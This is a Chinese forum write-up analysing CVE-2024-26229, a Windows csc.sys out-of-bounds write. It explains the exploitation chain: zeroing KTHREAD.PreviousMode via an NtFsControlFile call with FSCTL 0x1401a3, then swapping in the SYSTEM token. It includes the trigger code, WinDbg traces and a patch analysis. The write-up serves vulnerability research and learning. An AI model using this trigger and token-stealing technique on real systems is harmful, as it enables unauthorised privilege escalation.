-
-
[原创] CVE-2024-26229 Windows CSC 本地内核提权漏洞分析
-
发表于: 2024-6-17 14:37 10225
-
该漏洞为windows csc.sys驱动越界写导致的本地内核提权漏洞。
我们利用漏洞进行越界写0修改KTHREAD结构中的PreviousMode字段,使其为KernelMode。这样,后续的写操作不会进行权限检查,从而允许我们修改内核数据结构,实现任意地址写入。
通过任意地址写入操作,我们可以将当前进程的Token字段替换为系统进程的Token字段。这样当前进程就能够获得系统进程的权限,从而实现提权。
PreviousMode 通常是 KTHREAD 结构的一部分,在 Windows 内核的头文件中,PreviousMode 通常被定义为 MODE 枚举类型,数据结构如下图所示:
在 Windows 内核中,PreviousMode
用于标识线程最后一次执行的模式。这个字段有两个值:
PreviousMode 值设置为 0 后,NtReadVirtualMemory()
或 NtWriteVirtualMemory()
、NtAllocateVirtualMemory()
等函数可以被滥用来读取、写入、分配内核内存,因为地址验证检查将被跳过。逆向ntoskrnl.exe
可以获取函数原型,下面举两个例子来了解判断的运行流程:NtWriteVirtualMemory()
:
NtAllocateVirtualMemory()
:
当一个用户模式应用程序调用本地系统服务例程的 Nt 或 Zw 版本时,该例程总是将它接收到的参数视为来自一个不受信任的用户模式源的值。该例程会在使用这些参数之前彻底验证参数值,探测任何由调用者提供的缓冲区,以验证这些缓冲区是否位于有效的用户模式内存中,并且是否对齐正确。
参考:Using Nt and Zw Versions of the Native System Services Routines
举一个例子,如果一个 NtXxx 例程的参数包括一个输入或输出缓冲区,并且如果 PreviousMode = UserMode
,那么该例程会调用 ProbeForRead 或 ProbeForWrite 例程来验证缓冲区。如果缓冲区是分配在系统内存而不是用户模式内存中,ProbeForXxx 例程会引发一个异常,并且 NtXxx 例程会返回 STATUS_ACCESS_VIOLATION
错误代码。
参考:PreviousMode
所以可以看到当 PreviousMode 为0时检查将被绕过,可以直接使用NtWriteVirtualMemory
函数进行任意地址写入操作。
替换流程:
什么是 EPROCESS 结构?
EPROCESS结构体是Windows操作系统内核中用于表示进程的关键数据结构,它包含了进程相关的信息和指向其他相关结构体数据结构的指针,在这里我们需要通过EPROCESS地址来定位到token地址。
这里使用test01.exe进行调试分析:
Token的值在不同windows版本偏移不相同,此处为0x4b8
:
所以,当前 EPROCESS 结构的地址是 ffffcb8381cf3080
,Token 的地址是ffffcb8381cf3080 + 0x4b8
。
查找指定进程的token地址的代码逻辑(以获取当前进程token地址举例):
因此我们通过句柄可以间接找到对应的内核对象地址,对于进程句柄这个地址就是 EPROCESS 地址。有了EPROCESS地址,我们就可以通过偏移获取当前进程的token地址。获取指定PID的token地址也是一样的,这样当我们可以进行任意地址写入后就可以直接将system token写到我们指定进程的token中了。
csc.sys驱动是一个处理客户端缓存(Client-Side Caching)和提供离线文件功能的系统驱动(windows默认启用)。csc.sys允许用户在断网的情况下继续访问和操作网络文件,当用户在没有网络连接的情况下对这些文件进行更改时,这些更改首先影响的是本地缓存的副本;一旦网络连接恢复,CSC.sys 会负责将这些本地更改同步回网络位置,确保网络上的数据与本地的副本保持一致。
此处使用 csc_10.0.19041.3636.sys
与 csc_10.0.19041.4291_KB5036892.sys
来进行分析。
对比补丁发现主要针对CscDevFcbXXXControlFile
进行了修改:csc!CscDevFcbXXXControlFile
是什么?这个函数是如何进行调用?
从该函数命名我们可以得知Fcb(File Control Block)是与文件系统的操作相关的,代码的核心逻辑通过逆向可知是文件系统接收FSCTL code(文件系统控制码)进行操作,windows发送FSCTL code使用的是NtFsControlFile
函数。NtFsControlFile
是 Windows 操作系统中一个提供文件系统控制操作的内核API,其函数原型如下:
从函数原型中得知对应的FSCTL0x001401a3
是通过NtFsControlFile
的FsControlCode
参数进行传递的。
在CscDevFcbXXXControlFile()
当传递对应的 FSCTL code 符合条件后进入代码核心操作,我们观察下面操作是如何进行越界写0的:
可以看到CscDevFcbXXXControlFile()
有两处写0操作:
传入的参数a1是什么?
当我们传递NtFsControlFile
的函数参数进行调用时,多个函数会根据参数进行处理,最后传给csc!CscDevFcbXXXControlFile
的参数a1并非是我们传入的线程内核地址,而且是一个指向数据结构的指针,数据结构为:
此处参数a1并非我们可控的,所以第一个写0处不可控;但是a1+0x218
则是我们通过NTFsControlFile
传入的地址,此处导致我们越界写0可控。
因此我们此处构造的pNtFsControlFile()
函数代码如下所示,其中 PreviousMode 的偏移为0x232
,减去0x18
来抵消掉等式中的增加0x18
:
可以看到未触发漏洞前PreviousMode为1,在触发漏洞后则被越界写为0。
前四个参数通过寄存器 RCX、RDX、R8、和 R9 传递,剩余的参数则通过栈传递:
当前线程地址为ffff988f73f5d080
:
可以看到上面函数的传参均符合预期。
函数传入参数为ffff988f7450fc80
,对应传入参数a1,分析出指针指向的数据结构:
该函数用于更新和捕获连接状态,其中对判断函数中变量的改变起到了关键作用。
函数第一个参数为指向数据结构的一个指针,对应CscDevFcbXXXControlFile Param + 0x0038
:
其中函数参数v14
初始化为0,此处传递v14
的地址进行运算,函数的调用中后续会使用该变量进行判断,为该函数的第5个参数:
可以看到 rsp 寄存器的值为ffff95020867d218
。在堆栈中第五个参数的地址存储在rsp + 0x28
位置,即ffff95020867d240
。对应值为ffff9502
0867d288`,其当前指向地址值为0:
在运算结束后,其值发生改变,则因此进入了我们的核心运算逻辑:
经过上面的分析,我们下面实现漏洞利用代码了。
此处使用NtQuerySystemInformation来进行内核地址泄露:
该函数用户获取当前进程内核对象地址和system进程内核对象地址:
其中EPROCESS
的token偏移在windows不同版本可能有所不同,这里根据漏洞涉及范围进行了统计:
可以使用未公开函数RtlGetNtVersionNumbers
来获取版本号再设置偏移:
如果不进行此操作则会触发BSOD:
成功提权。
分析的补丁为KB5036892,该补丁进行的调整:
查看该函数变动:
可以看到在FSCTL code等于0x1401a3
后,新增了Feature_1543900478__private_IsEnabled
功能判断,该函数是微软补丁用来适配未打补丁的系统的,因此打了补丁的系统会让该函数返回值为1,进入else判断中:
在Feature_1543900478__private_IsEnabled
函数返回值为0,则会如同之前漏洞版本的驱动一下可以进行越界写0。在打完补丁返回值为1后,则进入else中,使用ProbeForWrite
对我们传入的内核地址进行检查。ProbeForWrite
的函数函数原型为:
该函数的作用是:
这两个检查任意一个不成功,该函数都会引发一个异常(例如违规访问)。像是我们之前直接传入内核地址在这里就会触发异常,因此补丁之后无法触发漏洞。
假如有下面这样一个例子:
如果使用addr=kernelmode, size=0
则可用于绕过 ProbeForWrite 检查,这是TOCTOU的利用手法。在 ProbeForWrite 检查和操作之间有一个时间窗口,在这个窗口期内,初始验证的条件可能被改变,从而导致 ProbeForWrite 检查被绕过。具体分为两个阶段:
但是当前补丁中无法直接控制该参数,并且在前面的判断中要求InputBufferLength
必须大于0x24,目前在这里没有找到绕过方法:
这是一个比较经典的漏洞类型,值得学习。文中仍有很多不足,感谢师傅们的指点和帮助,以后定会对文章内容严格把控,如有问题,多多包涵,欢迎提出建议和意见。
CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive
Microsoft Windows Server 2003 SP2 本地提权(CVE-2014-4076)
MS08-066 : Catching and fixing a ProbeForRead / ProbeForWrite bypass
https://forum.butian.net/share/3101
__int64
__fastcall NtWriteVirtualMemory(
HANDLE
ProcessHandle,
PVOID
BaseAddress,
PVOID
Buffer,
__int64
BufferSize,
__int64
*NumberOfBytesWritten)
{
pCurrentThread = KeGetCurrentThread();
// 获取当前线程的模式
PreviousMode = pCurrentThread->PreviousMode;
// 进行 PreviousMode 检查
if
( PreviousMode )
{
EndAddress = BaseAddress + BufferSize;
if
( BaseAddress + BufferSize lt; BaseAddress )
return
STATUS_ACCESS_VIOLATION;
BufferEnd = Buffer + BufferSize;
if
( BufferEnd MmHighestUserAddress || BufferEnd > MmHighestUserAddress )
return
STATUS_ACCESS_VIOLATION;
if
( NumberOfBytesWritten )
{
NumberOfBytesWritten_ = NumberOfBytesWritten;
if
( NumberOfBytesWritten >= MmUserProbeAddress )
NumberOfBytesWritten_ = MmUserProbeAddress;
*NumberOfBytesWritten_ = *NumberOfBytesWritten_;
}
}
...
__int64
__fastcall NtWriteVirtualMemory(
HANDLE
ProcessHandle,
PVOID
BaseAddress,
PVOID
Buffer,
__int64
BufferSize,
__int64
*NumberOfBytesWritten)
{
pCurrentThread = KeGetCurrentThread();
// 获取当前线程的模式
PreviousMode = pCurrentThread->PreviousMode;
// 进行 PreviousMode 检查
if
( PreviousMode )
{
EndAddress = BaseAddress + BufferSize;
if
( BaseAddress + BufferSize lt; BaseAddress )
return
STATUS_ACCESS_VIOLATION;
BufferEnd = Buffer + BufferSize;
if
( BufferEnd MmHighestUserAddress || BufferEnd > MmHighestUserAddress )
return
STATUS_ACCESS_VIOLATION;
if
( NumberOfBytesWritten )
{
NumberOfBytesWritten_ = NumberOfBytesWritten;
if
( NumberOfBytesWritten >= MmUserProbeAddress )
NumberOfBytesWritten_ = MmUserProbeAddress;
*NumberOfBytesWritten_ = *NumberOfBytesWritten_;
}
}
...
NTSTATUS __stdcall NtAllocateVirtualMemory(
HANDLE
ProcessHandle,
PVOID
*BaseAddress,
ULONG_PTR
ZeroBits,
PSIZE_T
RegionSize,
ULONG
AllocationType,
ULONG
Protect)
{
// 获取当前线程的模式
char
PreviousMode = KeGetCurrentThread()->PreviousMode;
// 如果是用户模式,验证指针是否超出用户模式地址空间
if
(PreviousMode && ((
uintptr_t
)BaseAddress >= 0x7FFFFFFF0000 || (
uintptr_t
)RegionSize >= 0x7FFFFFFF0000)) {
return
STATUS_ACCESS_VIOLATION;
}
// 检查非法的分配类型
if
((AllocationType & 0x44000) != 0) {
return
STATUS_INVALID_PARAMETER;
}
// 根据传入参数调用内核函数进行实际的内存分配
NTSTATUS status = MiAllocateVirtualMemoryCommon(
ProcessHandle,
BaseAddress,
ZeroBits,
RegionSize,
AllocationType,
Protect,
PreviousMode);
return
status;
}
NTSTATUS __stdcall NtAllocateVirtualMemory(
HANDLE
ProcessHandle,
PVOID
*BaseAddress,
ULONG_PTR
ZeroBits,
PSIZE_T
RegionSize,
ULONG
AllocationType,
ULONG
Protect)
{
// 获取当前线程的模式
char
PreviousMode = KeGetCurrentThread()->PreviousMode;
// 如果是用户模式,验证指针是否超出用户模式地址空间
if
(PreviousMode && ((
uintptr_t
)BaseAddress >= 0x7FFFFFFF0000 || (
uintptr_t
)RegionSize >= 0x7FFFFFFF0000)) {
return
STATUS_ACCESS_VIOLATION;
}
// 检查非法的分配类型
if
((AllocationType & 0x44000) != 0) {
return
STATUS_INVALID_PARAMETER;
}
// 根据传入参数调用内核函数进行实际的内存分配
NTSTATUS status = MiAllocateVirtualMemoryCommon(
ProcessHandle,
BaseAddress,
ZeroBits,
RegionSize,
AllocationType,
Protect,
PreviousMode);
return
status;
}
1: kd> !process 0 0 test01.exe
PROCESS ffffcb8381cf3080
SessionId: 1 Cid: 164c Peb: 3200cac000 ParentCid: 114c
DirBase: 1e2fb5002 ObjectTable: ffff81028a337e80 HandleCount: 41.
Image: test01.exe
1: kd> !process 0 0 test01.exe
PROCESS ffffcb8381cf3080
SessionId: 1 Cid: 164c Peb: 3200cac000 ParentCid: 114c
DirBase: 1e2fb5002 ObjectTable: ffff81028a337e80 HandleCount: 41.
Image: test01.exe
NTSTATUS NtFsControlFile(
HANDLE
FileHandle,
// 要操作的文件句柄
HANDLE
Event,
// 指定一个事件,或NULL
PIO_APC_ROUTINE ApcRoutine,
// 异步操作的APC回调,或NULL
PVOID
ApcContext,
// APC回调的上下文参数
PIO_STATUS_BLOCK IoStatusBlock,
// 操作结果状态块
ULONG
FsControlCode,
// 文件系统控制操作的代码
PVOID
InputBuffer,
// 输入数据缓冲区,根据控制代码而定
ULONG
InputBufferLength,
// 输入数据的长度
PVOID
OutputBuffer,
// 输出数据缓冲区,根据控制代码而定
ULONG
OutputBufferLength
// 输出数据的长度
);
NTSTATUS NtFsControlFile(
HANDLE
FileHandle,
// 要操作的文件句柄
HANDLE
Event,
// 指定一个事件,或NULL
PIO_APC_ROUTINE ApcRoutine,
// 异步操作的APC回调,或NULL
PVOID
ApcContext,
// APC回调的上下文参数
PIO_STATUS_BLOCK IoStatusBlock,
// 操作结果状态块
ULONG
FsControlCode,
// 文件系统控制操作的代码
PVOID
InputBuffer,
// 输入数据缓冲区,根据控制代码而定
ULONG
InputBufferLength,
// 输入数据的长度
PVOID
OutputBuffer,
// 输出数据缓冲区,根据控制代码而定
ULONG
OutputBufferLength
// 输出数据的长度
);
if
( *(_DWORD *)(a1 + 0x20C) == 0x1401A3 )
{
v10 = *(_QWORD *)(a1 + 0x218);
v4 = 0;
*(_QWORD *)(a1 + 0xB8) = 0i64;
*(_QWORD *)(v10 + 0x18) = 0i64;
// 漏洞利用
}
if
( *(_DWORD *)(a1 + 0x20C) == 0x1401A3 )
{
v10 = *(_QWORD *)(a1 + 0x218);
v4 = 0;
*(_QWORD *)(a1 + 0xB8) = 0i64;
*(_QWORD *)(v10 + 0x18) = 0i64;
// 漏洞利用
}
CscDevFcbXXXControlFile Param Address:
+0x0038 UpdateAndCaptureConnectionState Input Data Structure
+0x020C FSCTL code
+0x0218 InputBuffer (NTFsControlFile Param Address)
+0x0228 InputBufferLength
CscDevFcbXXXControlFile Param Address:
+0x0038 UpdateAndCaptureConnectionState Input Data Structure
+0x020C FSCTL code
+0x0218 InputBuffer (NTFsControlFile Param Address)
+0x0228 InputBufferLength
status = pNtFsControlFile(
handle,
NULL,
NULL,
NULL,
&iosb,
0x001401a3,
(
void
*)(Curthread + 0x232 - 0x18),
// 漏洞利用
0,
NULL,
0);
status = pNtFsControlFile(
handle,
NULL,
NULL,
NULL,
&iosb,
0x001401a3,
(
void
*)(Curthread + 0x232 - 0x18),
// 漏洞利用
0,
NULL,
0);
1: kd> !sym noisy
1: kd> !reload
1: kd> lm t n
1: kd> .reload /f csc.sys
1: kd> bp csc!CscDevFcbXXXControlFile
1: kd> g
Breakpoint 0 hit
csc!CscDevFcbXXXControlFile:
fffff800`79869e30 4c8bdc mov r11,rsp
1: kd> !sym noisy
1: kd> !reload
1: kd> lm t n
1: kd> .reload /f csc.sys
1: kd> bp csc!CscDevFcbXXXControlFile
1: kd> g
Breakpoint 0 hit
csc!CscDevFcbXXXControlFile:
fffff800`79869e30 4c8bdc mov r11,rsp
1: kd> !process 0 0 CVE-2024-26229-DEBUG.exe
PROCESS ffffcb8381e8d080
SessionId: 1 Cid: 0b74 Peb: d4d6503000 ParentCid: 114c
DirBase: 1bf522002 ObjectTable: ffff81028a34b180 HandleCount: 37.
Image: CVE-2024-26229-EXP.exe
1: kd> !process 0 0 CVE-2024-26229-DEBUG.exe
PROCESS ffffcb8381e8d080
SessionId: 1 Cid: 0b74 Peb: d4d6503000 ParentCid: 114c
DirBase: 1bf522002 ObjectTable: ffff81028a34b180 HandleCount: 37.
Image: CVE-2024-26229-EXP.exe
1: kd> !process ffffcb8381e8d080 7
PROCESS ffffcb8381e8d080
SessionId: 1 Cid: 04c8 Peb: 96def11000 ParentCid: 114c
DirBase: 1aba81002 ObjectTable: ffff81028a345c80 HandleCount: 37.
Image: CVE-2024-26229-EXP.exe
VadRoot ffffcb83831a8c90 Vads 28 Clone 0 Private 1062. Modified 0. Locked 0.
DeviceMap ffff810284057490
Token ffff810287cb9870
ElapsedTime 00:00:00.141
UserTime 00:00:00.000
KernelTime 00:00:00.000
QuotaPoolUsage[PagedPool] 22504
QuotaPoolUsage[NonPagedPool] 4072
Working Set Sizes (now,min,max) (1669, 50, 345) (6676KB, 200KB, 1380KB)
PeakWorkingSetSize 1630
VirtualSize 4148 Mb
PeakVirtualSize 4148 Mb
PageFaultCount 2139
MemoryPriority BACKGROUND
BasePriority 8
CommitCharge 1533
Job ffffcb8380fe9060
THREAD ffffcb837fc6e080 Cid 04c8.0160 Teb: 00000096def12000 Win32Thread: 0000000000000000 RUNNING on processor 1
IRP List:
ffffcb8381150460: (0006,0430) Flags: 00060800 Mdl: 00000000
Not impersonating
DeviceMap ffff810284057490
Owning Process ffffcb8381e8d080 Image: CVE-2024-26229-EXP.exe
Attached Process N/A Image: N/A
Wait Start TickCount 1523195 Ticks: 0
Context Switch Count 138 IdealProcessor: 0
UserTime 00:00:00.000
KernelTime 00:00:00.046
Win32 Start Address 0x00007ff767d91810
Stack Init ffffc90a255e7c90 Current ffffc90a255e7530
Base ffffc90a255e8000 Limit ffffc90a255e2000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
1: kd> !process ffffcb8381e8d080 7
PROCESS ffffcb8381e8d080
SessionId: 1 Cid: 04c8 Peb: 96def11000 ParentCid: 114c
DirBase: 1aba81002 ObjectTable: ffff81028a345c80 HandleCount: 37.
Image: CVE-2024-26229-EXP.exe
VadRoot ffffcb83831a8c90 Vads 28 Clone 0 Private 1062. Modified 0. Locked 0.
DeviceMap ffff810284057490
Token ffff810287cb9870
ElapsedTime 00:00:00.141
UserTime 00:00:00.000
KernelTime 00:00:00.000
QuotaPoolUsage[PagedPool] 22504
QuotaPoolUsage[NonPagedPool] 4072
Working Set Sizes (now,min,max) (1669, 50, 345) (6676KB, 200KB, 1380KB)
PeakWorkingSetSize 1630
VirtualSize 4148 Mb
PeakVirtualSize 4148 Mb
PageFaultCount 2139
MemoryPriority BACKGROUND
BasePriority 8
CommitCharge 1533
Job ffffcb8380fe9060
THREAD ffffcb837fc6e080 Cid 04c8.0160 Teb: 00000096def12000 Win32Thread: 0000000000000000 RUNNING on processor 1
IRP List:
ffffcb8381150460: (0006,0430) Flags: 00060800 Mdl: 00000000
Not impersonating
DeviceMap ffff810284057490
Owning Process ffffcb8381e8d080 Image: CVE-2024-26229-EXP.exe
Attached Process N/A Image: N/A
Wait Start TickCount 1523195 Ticks: 0
Context Switch Count 138 IdealProcessor: 0
UserTime 00:00:00.000
KernelTime 00:00:00.046
Win32 Start Address 0x00007ff767d91810
Stack Init ffffc90a255e7c90 Current ffffc90a255e7530
Base ffffc90a255e8000 Limit ffffc90a255e2000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
1: kd> dt nt!_KTHREAD ffffcb837fc6e080
// 省略若干字段
+0x220 Process : 0xffffcb83`81e8d080 _KPROCESS
+0x228 UserAffinity : _GROUP_AFFINITY
+0x228 UserAffinityFill : [10]
"???"
+0x232 PreviousMode : 1
''
+0x233 BasePriority : 8
''
+0x234 PriorityDecrement : 0
''
+0x234 ForegroundBoost : 0y0000
// 省略若干字段
1: kd> dt nt!_KTHREAD ffffcb837fc6e080
// 省略若干字段
+0x220 Process : 0xffffcb83`81e8d080 _KPROCESS
+0x228 UserAffinity : _GROUP_AFFINITY
+0x228 UserAffinityFill : [10]
"???"
+0x232 PreviousMode : 1
''
+0x233 BasePriority : 8
''
+0x234 PriorityDecrement : 0
''
+0x234 ForegroundBoost : 0y0000
// 省略若干字段
dt nt!_KTHREAD ffffcb837fc6e080
// 省略若干字段
+0x220 Process : 0xffffcb83`81e8d080 _KPROCESS
+0x228 UserAffinity : _GROUP_AFFINITY
+0x228 UserAffinityFill : [10]
"???"
+0x232 PreviousMode : 0
''
// 被修改
+0x233 BasePriority : 8
''
+0x234 PriorityDecrement : 0
''
+0x234 ForegroundBoost : 0y0000
// 省略若干字段
dt nt!_KTHREAD ffffcb837fc6e080
// 省略若干字段
+0x220 Process : 0xffffcb83`81e8d080 _KPROCESS
+0x228 UserAffinity : _GROUP_AFFINITY
+0x228 UserAffinityFill : [10]
"???"
+0x232 PreviousMode : 0
''
// 被修改
+0x233 BasePriority : 8
''
+0x234 PriorityDecrement : 0
''
+0x234 ForegroundBoost : 0y0000
// 省略若干字段
0: kd> x nt!*NtFsControlFile*
fffff804`756e6f60 nt!NtFsControlFile (NtFsControlFile)
1: kd> !process 0 0 CVE-2024-26229-DEBUG.exe
PROCESS ffff988f7520e080
SessionId: 1 Cid: 0568 Peb: 6c0bc49000 ParentCid: 10f4
DirBase: 220cf5002 ObjectTable: ffffaa006bd91980 HandleCount: 44.
Image: CVE-2024-26229-DEBUG.exe
// 获取目标调用线程EPROCESS地址(0xffff988f740b0080)
1: kd> !process ffff988f7520e080 7
// 过滤其他程序对NtFsControlFile的调用
1: kd> bp nt!NtFsControlFile
".if (@$proc != 0xffff988f740b0080) {gc;}"
1: kd> r
rax=fffff804756e6f60 rbx=ffff988f73f5d080 rcx=000000000000008c
rdx=0000000000000000 rsi=000000c4490ff678 rdi=ffff95020867daa8
rip=fffff804756e6f60 rsp=ffff95020867da88 rbp=ffff95020867db80
r8=0000000000000000 r9=0000000000000000 r10=fffff804756e6f60
r11=fffff804753ef320 r12=0000000000000000 r13=0000000000000000
r14=ffff988f7065c040 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
0: kd> x nt!*NtFsControlFile*
fffff804`756e6f60 nt!NtFsControlFile (NtFsControlFile)
1: kd> !process 0 0 CVE-2024-26229-DEBUG.exe
PROCESS ffff988f7520e080
SessionId: 1 Cid: 0568 Peb: 6c0bc49000 ParentCid: 10f4
DirBase: 220cf5002 ObjectTable: ffffaa006bd91980 HandleCount: 44.
Image: CVE-2024-26229-DEBUG.exe
// 获取目标调用线程EPROCESS地址(0xffff988f740b0080)
1: kd> !process ffff988f7520e080 7
// 过滤其他程序对NtFsControlFile的调用
1: kd> bp nt!NtFsControlFile
".if (@$proc != 0xffff988f740b0080) {gc;}"
1: kd> r
rax=fffff804756e6f60 rbx=ffff988f73f5d080 rcx=000000000000008c
rdx=0000000000000000 rsi=000000c4490ff678 rdi=ffff95020867daa8
rip=fffff804756e6f60 rsp=ffff95020867da88 rbp=ffff95020867db80
r8=0000000000000000 r9=0000000000000000 r10=fffff804756e6f60
r11=fffff804753ef320 r12=0000000000000000 r13=0000000000000000
r14=ffff988f7065c040 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
1: kd> dps rsp L9
ffff9502`0867da88 fffff804`753ef375 nt!KiSystemServiceCopyEnd+0x25
ffff9502`0867da90 00000000`000000a8
ffff9502`0867da98 00000000`00000000
ffff9502`0867daa0 00000000`00000000
ffff9502`0867daa8 ffff988f`74aaf080
ffff9502`0867dab0 000000c4`490ff728
ffff9502`0867dab8 00000000`001401a3
ffff9502`0867dac0 ffff988f`73f5d29a
ffff9502`0867dac8 00000000`00000000
1: kd> dps rsp L9
ffff9502`0867da88 fffff804`753ef375 nt!KiSystemServiceCopyEnd+0x25
ffff9502`0867da90 00000000`000000a8
ffff9502`0867da98 00000000`00000000
ffff9502`0867daa0 00000000`00000000
ffff9502`0867daa8 ffff988f`74aaf080
ffff9502`0867dab0 000000c4`490ff728
ffff9502`0867dab8 00000000`001401a3
ffff9502`0867dac0 ffff988f`73f5d29a
ffff9502`0867dac8 00000000`00000000
0xffff988f73f5d29a = 0xffff988f73f5d080 + 0x232 -0x18
0xffff988f73f5d29a = 0xffff988f73f5d080 + 0x232 -0x18
1: kd> bp csc!CscDevFcbXXXControlFile
1: kd> g
Breakpoint 1 hit
csc!CscDevFcbXXXControlFile:
fffff804`7af69e30 4c8bdc mov r11,rsp
1: kd> r
rax=fffff8047af69e30 rbx=ffff988f7450fc80 rcx=ffff988f7450fc80
rdx=ffff988f74f2b820 rsi=ffff988f74f2b820 rdi=ffff988f712a6030
rip=fffff8047af69e30 rsp=ffff95020867d2b8 rbp=ffff988f74f2b820
r8=0000000000000000 r9=ffff988f74f2b980 r10=fffff8047530eba0
r11=ffff95020867d320 r12=fffff8047aeab000 r13=fffff8047aea44f0
r14=000000000000ec23 r15=ffff988f74f2b980
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246
csc!CscDevFcbXXXControlFile:
fffff804`7af69e30 4c8bdc mov r11,rsp
// FSCTL Code
1: kd> dq ffff988f7450fc80+0x20C
ffff988f`7450fe8c 00000000`001401a3 73f5d29a`00000000
ffff988f`7450fe9c 00000000`ffff988f 00000000`00000000
ffff988f`7450feac 00000000`00000000 00000000`00000000
ffff988f`7450febc 00000000`00000000 00000000`00000000
ffff988f`7450fecc 00000000`00000000 00000000`00000000
ffff988f`7450fedc 00000000`00000000 00000000`00000000
ffff988f`7450feec 00000000`00000000 00000000`00000000
ffff988f`7450fefc 00000000`00000000 00000000`00000000
// NTFsControlFile Param Address
1: kd> dq ffff988f7450fc80+0x218
ffff988f`7450fe98 ffff988f`73f5d29a 00000000`00000000
ffff988f`7450fea8 00000000`00000000 00000000`00000000
ffff988f`7450feb8 00000000`00000000 00000000`00000000
ffff988f`7450fec8 00000000`00000000 00000000`00000000
ffff988f`7450fed8 00000000`00000000 00000000`00000000
ffff988f`7450fee8 00000000`00000000 00000000`00000000
ffff988f`7450fef8 00000000`00000000 00000000`00000000
ffff988f`7450ff08 00000000`00000000 00000000`00000000
1: kd> bp csc!CscDevFcbXXXControlFile
1: kd> g
Breakpoint 1 hit
csc!CscDevFcbXXXControlFile:
fffff804`7af69e30 4c8bdc mov r11,rsp
1: kd> r
rax=fffff8047af69e30 rbx=ffff988f7450fc80 rcx=ffff988f7450fc80
rdx=ffff988f74f2b820 rsi=ffff988f74f2b820 rdi=ffff988f712a6030
rip=fffff8047af69e30 rsp=ffff95020867d2b8 rbp=ffff988f74f2b820
r8=0000000000000000 r9=ffff988f74f2b980 r10=fffff8047530eba0
r11=ffff95020867d320 r12=fffff8047aeab000 r13=fffff8047aea44f0
r14=000000000000ec23 r15=ffff988f74f2b980
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246
csc!CscDevFcbXXXControlFile:
fffff804`7af69e30 4c8bdc mov r11,rsp
// FSCTL Code
1: kd> dq ffff988f7450fc80+0x20C
ffff988f`7450fe8c 00000000`001401a3 73f5d29a`00000000
ffff988f`7450fe9c 00000000`ffff988f 00000000`00000000
ffff988f`7450feac 00000000`00000000 00000000`00000000
ffff988f`7450febc 00000000`00000000 00000000`00000000
ffff988f`7450fecc 00000000`00000000 00000000`00000000
ffff988f`7450fedc 00000000`00000000 00000000`00000000
ffff988f`7450feec 00000000`00000000 00000000`00000000
ffff988f`7450fefc 00000000`00000000 00000000`00000000
// NTFsControlFile Param Address
1: kd> dq ffff988f7450fc80+0x218
ffff988f`7450fe98 ffff988f`73f5d29a 00000000`00000000
ffff988f`7450fea8 00000000`00000000 00000000`00000000
ffff988f`7450feb8 00000000`00000000 00000000`00000000
ffff988f`7450fec8 00000000`00000000 00000000`00000000
ffff988f`7450fed8 00000000`00000000 00000000`00000000
ffff988f`7450fee8 00000000`00000000 00000000`00000000
ffff988f`7450fef8 00000000`00000000 00000000`00000000
ffff988f`7450ff08 00000000`00000000 00000000`00000000
CscDevFcbXXXControlFile Param Address:
+0x0038 UpdateAndCaptureConnectionState Input Data Structure
+0x020C FSCTL code
+0x0218 NTFsControlFile Param Address
CscDevFcbXXXControlFile Param Address:
+0x0038 UpdateAndCaptureConnectionState Input Data Structure
+0x020C FSCTL code
+0x0218 NTFsControlFile Param Address
1: kd> bp csc!CscUpdateAndCaptureConnectionStateEx
1: kd> g
Breakpoint 2 hit
csc!CscUpdateAndCaptureConnectionStateEx:
fffff804`7af02970 48895c2410 mov qword ptr [rsp+10h],rbx
1: kd> r
rax=ffff95020867d288 rbx=ffff988f7450fc80 rcx=fffff8047aeab3c0
rdx=ffffaa0069eadda0 rsi=0000000000000000 rdi=00000000c0000010
rip=fffff8047af02970 rsp=ffff95020867d218 rbp=0000000000000001
r8=ffff988f7450fc80 r9=0000000000000000 r10=fffff8047530eba0
r11=ffff95020867d2b8 r12=fffff8047aeab000 r13=fffff8047aea44f0
r14=ffffaa0069eadda0 r15=fffff8047af37000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040246
csc!CscUpdateAndCaptureConnectionStateEx:
fffff804`7af02970 48895c2410 mov qword ptr [rsp+10h],rbx ss:0018:ffff9502`0867d228=0000000000000000
1: kd> bp csc!CscUpdateAndCaptureConnectionStateEx
1: kd> g
Breakpoint 2 hit
csc!CscUpdateAndCaptureConnectionStateEx:
fffff804`7af02970 48895c2410 mov qword ptr [rsp+10h],rbx
1: kd> r
rax=ffff95020867d288 rbx=ffff988f7450fc80 rcx=fffff8047aeab3c0
rdx=ffffaa0069eadda0 rsi=0000000000000000 rdi=00000000c0000010
rip=fffff8047af02970 rsp=ffff95020867d218 rbp=0000000000000001
r8=ffff988f7450fc80 r9=0000000000000000 r10=fffff8047530eba0
r11=ffff95020867d2b8 r12=fffff8047aeab000 r13=fffff8047aea44f0
r14=ffffaa0069eadda0 r15=fffff8047af37000
iopl=0 nv up ei pl zr na po nc
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)